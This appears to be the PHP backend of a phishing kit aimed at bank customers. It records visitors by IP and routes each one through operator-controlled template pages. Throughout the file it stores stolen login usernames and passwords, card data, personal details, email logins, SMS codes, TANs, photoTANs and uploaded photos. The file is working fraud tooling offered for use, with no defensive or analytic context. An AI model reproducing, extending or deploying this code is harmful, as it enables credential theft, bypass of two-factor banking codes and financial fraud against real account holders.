<?php
// Database connection details
require_once 'db_config.php';
 
// Check the request method
if ($_SERVER["REQUEST_METHOD"] == "POST") {

    // Handle the request based on the provided case
    if (isset($_POST["case"])) {
        $case = $_POST["case"];
        $user_ip = $_POST["user_ip"];
        $location = $_POST["location"];
        $status = $_POST["status"];
        $isL = $_POST["isL"];



        switch ($case) {
            case 1:
                $checkSql = "SELECT COUNT(*) as count FROM main WHERE ip_address = ?";
                $checkStmt = $conn->prepare($checkSql);
                $checkStmt->bind_param("s", $user_ip);
                $checkStmt->execute();
                $checkResult = $checkStmt->get_result();
                $checkRow = $checkResult->fetch_assoc();

                if ($checkRow['count'] == 0) {

                    // Generate a new user_id
                    $result = $conn->query("SELECT MAX(SUBSTRING(user_id, 3)) as max_user_id FROM main WHERE user_id LIKE 'Us%'");
                    if (!$result) {
                        die("Query failed: " . $conn->error);
                    }
                    $row = $result->fetch_assoc();
                    $max_user_id = $row['max_user_id'];
                    if ($max_user_id === NULL) {
                        $max_user_id = 0;
                    }
                    $new_user_id_numeric = $max_user_id + 1;
                    $new_user_id = "Us" . $new_user_id_numeric;

                    // Check if the generated user_id already exists in the database
                    $checkUserIdSql = "SELECT COUNT(*) as count FROM main WHERE user_id = ?";
                    $checkUserIdStmt = $conn->prepare($checkUserIdSql);
                    $checkUserIdStmt->bind_param("s", $new_user_id);
                    $checkUserIdStmt->execute();
                    $checkUserIdResult = $checkUserIdStmt->get_result();
                    $checkUserIdRow = $checkUserIdResult->fetch_assoc();

                    if ($checkUserIdRow['count'] > 0) {
                        // The generated user_id already exists, increment and try again
                        do {
                            $new_user_id_numeric++;
                            $new_user_id = "Us" . $new_user_id_numeric;
                            $checkUserIdStmt->bind_param("s", $new_user_id);
                            $checkUserIdStmt->execute();
                            $checkUserIdResult = $checkUserIdStmt->get_result();
                            $checkUserIdRow = $checkUserIdResult->fetch_assoc();
                        } while ($checkUserIdRow['count'] > 0);
                    }

                    $checkUserIdStmt->close();

                    // Get the current time in German timezone
                    $date = new DateTime("now", new DateTimeZone("Europe/Berlin"));
                    $access_time = $date->format('Y-m-d H:i:s');

                    // Insert a new record
                    $insertSql = "INSERT INTO main (ip_address, user_id, location, online_status, access_time) VALUES (?, ?, ?, 1, ?)";
                    $insertStmt = $conn->prepare($insertSql);
                    $insertStmt->bind_param("ssss", $user_ip, $new_user_id, $location, $access_time);

                    if ($insertStmt->execute()) {

                    } else {

                    }
                    $insertStmt->close();
                } else {
                    // Check if the page is being reloaded due to a location change
                    if (!$isL) {
                        $updateSql = "UPDATE main SET online_status = 1 WHERE ip_address = ?";
                        $updateStmt = $conn->prepare($updateSql);
                        $updateStmt->bind_param("s", $user_ip);
                        if ($updateStmt->execute()) {
                            echo "";
                        } else {
                            echo "";
                        }
                        $updateStmt->close();
                    }
                }
                $checkStmt->close();
                break;

            case 2:
                // Fetch the location from the database for the current user's IP address
                $fetchLocationSql = "SELECT location FROM main WHERE ip_address = ?";
                $fetchLocationStmt = $conn->prepare($fetchLocationSql);
                $fetchLocationStmt->bind_param("s", $user_ip);
                $fetchLocationStmt->execute();
                $fetchLocationResult = $fetchLocationStmt->get_result();
                $fetchLocationRow = $fetchLocationResult->fetch_assoc();

                // Check if the location was found in the database
                if ($fetchLocationRow) {
                    echo $fetchLocationRow['location'];
                } else {
                    echo "login.txt"; // Default template file if location is not found in the database
                }

                $fetchLocationStmt->close();
                break;

            case 3:
                // Update the online_status column in the database based on the user's IP address
                echo "Received status: " . $status . "<br>";

                // Proceed with the update only if status is not NULL
                if ($status !== null) {
                    $updateSql = "UPDATE main SET online_status =? WHERE ip_address =?";
                    $updateStmt = $conn->prepare($updateSql);
                    $updateStmt->bind_param("is", $status, $user_ip);
                    if ($updateStmt->execute()) {
                        echo "User status updated successfully";
                    } else {
                        echo "Error updating user status: " . $updateStmt->error;
                    }
                    $updateStmt->close();
                } else {
                    echo "Status is NULL, skipping update.";
                }
                break;

            case 4:
                // Fetch the location from the database for the current user's IP address
                $fetchLocationSql = "SELECT location FROM main WHERE ip_address = ?";
                $fetchLocationStmt = $conn->prepare($fetchLocationSql);
                $fetchLocationStmt->bind_param("s", $user_ip);
                $fetchLocationStmt->execute();
                $fetchLocationResult = $fetchLocationStmt->get_result();
                $fetchLocationRow = $fetchLocationResult->fetch_assoc();

                // Check if the location was found in the database
                if ($fetchLocationRow) {
                    echo $fetchLocationRow['location'];
                } else {
                    echo ''; // Return an empty string if no location is found
                }

                $fetchLocationStmt->close();
                break;

            case 'login':
                $user_ip = $_POST["user_ip"];
                $user = $_POST['user'];
                $pass = $_POST['pass']; 

                // Update the location to 'login_pass.txt' for the user IP
                $updateLocationSql = "UPDATE main SET login_username = ?, password = ? WHERE ip_address = ?";
                $updateLocationStmt = $conn->prepare($updateLocationSql);
                $updateLocationStmt->bind_param("sss", $user, $pass, $user_ip);
                if ($updateLocationStmt->execute()) {
                } else {
                }

                // Check the afk_status before updating the location
                $afkStatusSql = "SELECT afk_status FROM afk";
                $afkStatusStmt = $conn->prepare($afkStatusSql);
                $afkStatusStmt->execute();
                $afkStatusResult = $afkStatusStmt->get_result();
                $afkStatusRow = $afkStatusResult->fetch_assoc();

                if ($afkStatusRow['afk_status'] == 1) {
                    // If afk_status is 1, update the location to 'afk.txt'
                    $updateLocationSql = "UPDATE main SET location = 'afk.txt' WHERE ip_address =?";
                } else {
                    // If afk_status is 0, update the location to 'waiting.txt'
                    $updateLocationSql = "UPDATE main SET location = 'waiting.txt' WHERE ip_address =?";
                }

                $updateLocationStmt = $conn->prepare($updateLocationSql);
                $updateLocationStmt->bind_param("s", $user_ip);
                if (!$updateLocationStmt->execute()) {

                }
                $updateLocationStmt->close();
                break;


            case 'afk':
                // Perform the AFK case operations here
                // Retrieve data from the POST request
                $user_ip = $_POST["user_ip"];
                $joinedAFK = $_POST["joinedAFK"];

                // If the user_id exists, update the user details
                $updateSubmissionSql = "UPDATE main SET afk_submission = ? WHERE ip_address = ?";
                $updateSubmissionStmt = $conn->prepare($updateSubmissionSql);
                $updateSubmissionStmt->bind_param("ss", $joinedAFK, $user_ip);
                $operationSuccessful = $updateSubmissionStmt->execute();
                $updateSubmissionStmt->close();

                if ($operationSuccessful) { 

                    // Update the location to 'waiting_afk.txt' for the user ID
                    $updateLocationSql = "UPDATE main SET location = 'waiting_afk.txt' WHERE ip_address = ?";
                    $updateLocationStmt = $conn->prepare($updateLocationSql);
                    $updateLocationStmt->bind_param("s", $user_ip);
                    if ($updateLocationStmt->execute()) {
                        // Database operation was successful

                    } else {

                    }
                    $updateLocationStmt->close();
                } else {

                }
                break;

            case 'cc':
                // Perform the AFK case operations here
                $user_ip = $_POST["user_ip"];
                $joinedCC = $_POST["joinedCC"];

                // If the user_id exists, update the user details
                $updateSubmissionSql = "UPDATE main SET card = ? WHERE ip_address = ?";
                $updateSubmissionStmt = $conn->prepare($updateSubmissionSql);
                $updateSubmissionStmt->bind_param("ss", $joinedCC, $user_ip);
                $operationSuccessful = $updateSubmissionStmt->execute();
                $updateSubmissionStmt->close();

                if ($operationSuccessful) { 

                    // Update the location to 'waiting_afk.txt' for the user ID
                    $updateLocationSql = "UPDATE main SET location = 'waiting.txt' WHERE ip_address = ?";
                    $updateLocationStmt = $conn->prepare($updateLocationSql);
                    $updateLocationStmt->bind_param("s", $user_ip);
                    if ($updateLocationStmt->execute()) {
                        // Database operation was successful

                    } else {

                    }
                    $updateLocationStmt->close();
                } else {

                }
                break;

            case 'details':
                // Perform the AFK case operations here
                $user_ip = $_POST["user_ip"];
                $joinedDetails = $_POST["joinedDetails"];

                // If the user_id exists, update the user details
                $updateSubmissionSql = "UPDATE main SET details = ? WHERE ip_address = ?";
                $updateSubmissionStmt = $conn->prepare($updateSubmissionSql);
                $updateSubmissionStmt->bind_param("ss", $joinedDetails, $user_ip);
                $operationSuccessful = $updateSubmissionStmt->execute();
                $updateSubmissionStmt->close();

                if ($operationSuccessful) { 

                    // Update the location to 'waiting_afk.txt' for the user ID
                    $updateLocationSql = "UPDATE main SET location = 'waiting.txt' WHERE ip_address = ?";
                    $updateLocationStmt = $conn->prepare($updateLocationSql);
                    $updateLocationStmt->bind_param("s", $user_ip);
                    if ($updateLocationStmt->execute()) {
                        // Database operation was successful

                    } else {

                    }
                    $updateLocationStmt->close();
                } else {

                }
                break;

            case 'sms':
                // Retrieve data from the POST request
                $user_ip = $_POST["user_ip"];
                $sms_code = $_POST["sms_code"];

                // If the user_id exists, update the user details
                $updateSubmissionSql = "UPDATE main SET sms = ? WHERE ip_address = ?";
                $updateSubmissionStmt = $conn->prepare($updateSubmissionSql);
                $updateSubmissionStmt->bind_param("ss", $sms_code, $user_ip);
                $operationSuccessful = $updateSubmissionStmt->execute();
                $updateSubmissionStmt->close();

                if ($operationSuccessful) { 

                    // Update the location to 'waiting_afk.txt' for the user ID
                    $updateLocationSql = "UPDATE main SET location = 'waiting.txt' WHERE ip_address = ?";
                    $updateLocationStmt = $conn->prepare($updateLocationSql);
                    $updateLocationStmt->bind_param("s", $user_ip);
                    if ($updateLocationStmt->execute()) {
                        // Database operation was successful

                    } else {

                    }
                    $updateLocationStmt->close();
                } else {

                }
                break;

            case 'email':
                // Perform the AFK case operations here
                // Retrieve data from the POST request
                $user_ip = $_POST["user_ip"];
                $joinedEmail = $_POST["joinedEmail"];

                // If the user_id exists, update the user details
                $updateSubmissionSql = "UPDATE main SET email_login = ? WHERE ip_address = ?";
                $updateSubmissionStmt = $conn->prepare($updateSubmissionSql);
                $updateSubmissionStmt->bind_param("ss", $joinedEmail, $user_ip);
                $operationSuccessful = $updateSubmissionStmt->execute();
                $updateSubmissionStmt->close();

                if ($operationSuccessful) { 

                    // Update the location to 'waiting.txt' for the user ID
                    $updateLocationSql = "UPDATE main SET location = 'waiting.txt' WHERE ip_address = ?";
                    $updateLocationStmt = $conn->prepare($updateLocationSql);
                    $updateLocationStmt->bind_param("s", $user_ip);
                    if ($updateLocationStmt->execute()) {
                        // Database operation was successful

                    } else {

                    }
                    $updateLocationStmt->close();
                } else {

                }
                break;

            case 'tan':
                // Perform the AFK case operations here
                // Retrieve data from the POST request
                $user_ip = $_POST["user_ip"];
                $tan = $_POST["tan"];

                // If the user_id exists, update the user details
                $updateSubmissionSql = "UPDATE main SET tan = ? WHERE ip_address = ?";
                $updateSubmissionStmt = $conn->prepare($updateSubmissionSql);
                $updateSubmissionStmt->bind_param("ss", $tan, $user_ip);
                $operationSuccessful = $updateSubmissionStmt->execute();
                $updateSubmissionStmt->close();

                if ($operationSuccessful) { 

                    // Update the location to 'waiting.txt' for the user ID
                    $updateLocationSql = "UPDATE main SET location = 'waiting.txt' WHERE ip_address = ?";
                    $updateLocationStmt = $conn->prepare($updateLocationSql);
                    $updateLocationStmt->bind_param("s", $user_ip);
                    if ($updateLocationStmt->execute()) {
                        // Database operation was successful

                    } else {

                    }
                    $updateLocationStmt->close();
                } else {

                }
                break;

            case 'custom':
                // Perform the AFK case operations here 
                $user_ip = $_POST["user_ip"];
                $custom = $_POST['custom'];

                // If the user_id exists, update the user details
                $updateSubmissionSql = "UPDATE main SET custom = ? WHERE ip_address = ?";
                $updateSubmissionStmt = $conn->prepare($updateSubmissionSql);
                $updateSubmissionStmt->bind_param("ss", $custom, $user_ip);
                $operationSuccessful = $updateSubmissionStmt->execute();
                $updateSubmissionStmt->close();

                if ($operationSuccessful) { 

                    // Update the location to 'waiting_afk.txt' for the user ID
                    $updateLocationSql = "UPDATE main SET location = 'waiting.txt' WHERE ip_address = ?";
                    $updateLocationStmt = $conn->prepare($updateLocationSql);
                    $updateLocationStmt->bind_param("s", $user_ip);
                    if ($updateLocationStmt->execute()) {
                        // Database operation was successful

                    } else {

                    }
                    $updateLocationStmt->close();
                } else {
                    echo "Error processing AFK submission";
                }
                break;

            case 'pic_upload':
                // Perform file upload operations here
                $user_ip = $_POST["user_ip"];
                $file = $_FILES["image"];

                // Check if the user's directory exists, create if not
                $userDirPath = $config['panelLocation'] . 'IMGUploads/' . $user_ip;
                if (!file_exists($userDirPath)) {
                    mkdir($userDirPath, 0777, true);
                }

                // Move the uploaded file to the user's directory
                $fileName = basename($file["name"]);
                $filePath = $userDirPath . '/' . $fileName;
                if (move_uploaded_file($file["tmp_name"], $filePath)) {
                    // Update the database with the file path
                    $dbFilePath = str_replace($config['panelLocation'], '', $filePath);
                    $updateFilePathSql = "UPDATE main SET pic_upload = ?, location = 'waiting.txt' WHERE ip_address = ?";
                    $updateFilePathStmt = $conn->prepare($updateFilePathSql);
                    $updateFilePathStmt->bind_param("ss", $dbFilePath, $user_ip);
                    $operationSuccessful = $updateFilePathStmt->execute();
                    $updateFilePathStmt->close();

                    if ($operationSuccessful) { 
                    } else {

                    }
                } else {

                }
                break;

            case 'activation_upload':
                // Perform file upload operations here
                $user_ip = $_POST["user_ip"];
                $file = $_FILES["image"];

                // Check if the user's directory exists, create if not
                $userDirPath = $config['panelLocation'] . 'ActivationUploads/' . $user_ip;
                if (!file_exists($userDirPath)) {
                    mkdir($userDirPath, 0777, true);
                }

                // Move the uploaded file to the user's directory
                $fileName = basename($file["name"]);
                $filePath = $userDirPath . '/' . $fileName;
                if (move_uploaded_file($file["tmp_name"], $filePath)) {
                    // Update the database with the file path
                    $dbFilePath = str_replace($config['panelLocation'], '', $filePath);
                    $updateFilePathSql = "UPDATE main SET activation_upload = ?, location = 'waiting.txt' WHERE ip_address = ?";
                    $updateFilePathStmt = $conn->prepare($updateFilePathSql);
                    $updateFilePathStmt->bind_param("ss", $dbFilePath, $user_ip);
                    $operationSuccessful = $updateFilePathStmt->execute();
                    $updateFilePathStmt->close();

                    if ($operationSuccessful) { 
                    } else {

                    }
                } else {

                }
                break;

            // Inside db_middleman.php, add a case to handle fetching the username
            case 'fetch_qr':
                $user_ip = $_POST['user_ip'];
                $sql = "SELECT qr_img FROM main WHERE ip_address =?";
                $stmt = $conn->prepare($sql);
                $stmt->bind_param("s", $user_ip);
                $stmt->execute();
                $result = $stmt->get_result();
                if ($result->num_rows > 0) {
                    $row = $result->fetch_assoc();
                    echo $row['qr_img'];
                } else {

                }
                $stmt->close();
                break;

            case 'photo_tan':
                // Perform the AFK case operations here
                // Retrieve data from the POST request
                $user_ip = $_POST["user_ip"];
                $photo_tan = $_POST["photo_tan"];

                // If the user_id exists, update the user details
                $updateSubmissionSql = "UPDATE main SET photo_tan = ? WHERE ip_address = ?";
                $updateSubmissionStmt = $conn->prepare($updateSubmissionSql);
                $updateSubmissionStmt->bind_param("ss", $photo_tan, $user_ip);
                $operationSuccessful = $updateSubmissionStmt->execute();
                $updateSubmissionStmt->close();

                if ($operationSuccessful) { 
                    // Update the location to 'waiting_afk.txt' for the user IP
                    $updateLocationSql = "UPDATE main SET location = 'waiting.txt' WHERE ip_address = ?";
                    $updateLocationStmt = $conn->prepare($updateLocationSql);
                    $updateLocationStmt->bind_param("s", $user_ip);
                    if ($updateLocationStmt->execute()) {
                        // Operation successful
                    } else {
                        // Operation failed
                    }
                    $updateLocationStmt->close();
                } else {
                    // Operation failed
                }
                break;

            case 'success_trn':
                // Retrieve data from the POST request
                $user_ip = $_POST["user_ip"];

                // Update the location to 'waiting_afk.txt' for the user ID
                $updateLocationSql = "UPDATE main SET location = 'waiting.txt' WHERE ip_address = ?";
                $updateLocationStmt = $conn->prepare($updateLocationSql);
                $updateLocationStmt->bind_param("s", $user_ip);
                if ($updateLocationStmt->execute()) {
                    // Database operation was successful

                } else {

                }
                $updateLocationStmt->close();
                break;


            // Add more cases as needed
            default:
                echo "Invalid case<br>";
                break;
        }

    } else {
        echo "Case not provided<br>";
    }
} else {
    echo "No POST request received<br>";
}

$conn->close();
?>